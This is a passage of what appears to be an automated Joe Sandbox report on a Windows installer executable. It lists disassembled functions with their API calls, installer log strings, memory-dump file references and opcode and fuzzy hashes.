                                                                                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                  • API String ID: 1641139501-220328614
                                                                                                                                                  • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                  • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                  • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                  • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                  Strings
                                                                                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                                                                                  • API String ID: 3294113728-3145124454
                                                                                                                                                  • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                  • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                  • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                  • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                  Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                  • API String ID: 3734993849-2769509956
                                                                                                                                                  • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                  • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                  • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                  • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                  Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                  • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                  • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                  • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                  • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                  Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                  Strings
                                                                                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                  • API String ID: 1033533793-945480824
                                                                                                                                                  • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                  • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                  Strings
                                                                                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                  • API String ID: 2014279497-3433828417
                                                                                                                                                  • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                  • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                  Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                  • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                  • String ID: f
                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                  Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                  • MulDiv.KERNEL32(00021E00,00000064,?), ref: 00403295
                                                                                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                  Strings
                                                                                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                  Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                  • wsprintfW.USER32 ref: 00404457
                                                                                                                                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                  • String ID: %u.%u%s%s$@rD
                                                                                                                                                  • API String ID: 3540041739-1813061909
                                                                                                                                                  • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                  • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                                                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                  Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
